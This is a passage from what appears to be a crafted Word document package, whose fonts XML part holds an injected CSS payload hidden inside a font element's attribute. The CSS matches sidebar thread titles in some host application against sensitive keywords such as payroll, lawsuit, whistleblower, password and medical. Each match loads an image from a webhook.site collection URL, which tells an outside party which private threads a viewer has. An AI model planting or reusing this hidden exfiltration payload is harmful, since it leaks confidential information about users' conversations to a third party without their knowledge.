url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/vendor)!important}div[data-app-action-sidebar-thread-title*=&quot;invoice&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/invoice)!important}div[data-app-action-sidebar-thread-title*=&quot;lawsuit&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/lawsuit)!important}div[data-app-action-sidebar-thread-title*=&quot;listing&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/listing)!important}div[data-app-action-sidebar-thread-title*=&quot;malware&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/malware)!important}div[data-app-action-sidebar-thread-title*=&quot;medical&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/medical)!important}div[data-app-action-sidebar-thread-title*=&quot;patient&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/patient)!important}div[data-app-action-sidebar-thread-title*=&quot;payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/payroll)!important}div[data-app-action-sidebar-thread-title*=&quot;contents&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/contents)!important}div[data-app-action-sidebar-thread-title*=&quot;contract&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/contract)!important}div[data-app-action-sidebar-thread-title*=&quot;customer&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/customer)!important}div[data-app-action-sidebar-thread-title*=&quot;database&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/database)!important}div[data-app-action-sidebar-thread-title*=&quot;firewall&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/firewall)!important}div[data-app-action-sidebar-thread-title*=&quot;incident&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/incident)!important}div[data-app-action-sidebar-thread-title*=&quot;password&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/password)!important}div[data-app-action-sidebar-thread-title*=&quot;phishing&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/phishing)!important}div[data-app-action-sidebar-thread-title*=&quot;supplier&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/supplier)!important}div[data-app-action-sidebar-thread-title*=&quot;directory&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/directory)!important}div[data-app-action-sidebar-thread-title*=&quot;severance&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/severance)!important}div[data-app-action-sidebar-thread-title*=&quot;valuation&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/valuation)!important}div[data-app-action-sidebar-thread-title*=&quot;redundancy&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/redundancy)!important}div[data-app-action-sidebar-thread-title*=&quot;settlement&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/settlement)!important}div[data-app-action-sidebar-thread-title*=&quot;acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/acquisition)!important}div[data-app-action-sidebar-thread-title*=&quot;resignation&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/resignation)!important}div[data-app-action-sidebar-thread-title*=&quot;restructure&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/restructure)!important}div[data-app-action-sidebar-thread-title*=&quot;termination&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/termination)!important}div[data-app-action-sidebar-thread-title*=&quot;confidential&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/confidential)!important}div[data-app-action-sidebar-thread-title*=&quot;disciplinary&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/disciplinary)!important}div[data-app-action-sidebar-thread-title*=&quot;whistleblower&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/whistleblower)!important}div[data-app-action-sidebar-thread-title*=&quot;zz-no-such-thread&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/zz-no-such-thread)!important}.m{color:red}">
    <w:embedRegular r:id="rIdF1" w:fontKey="{00000000-0000-0000-0000-000000000000}"/>
  </w:font>
</w:fonts>
</file>

<file path=word/_rels/document.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rIdFT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/Relationships>
</file>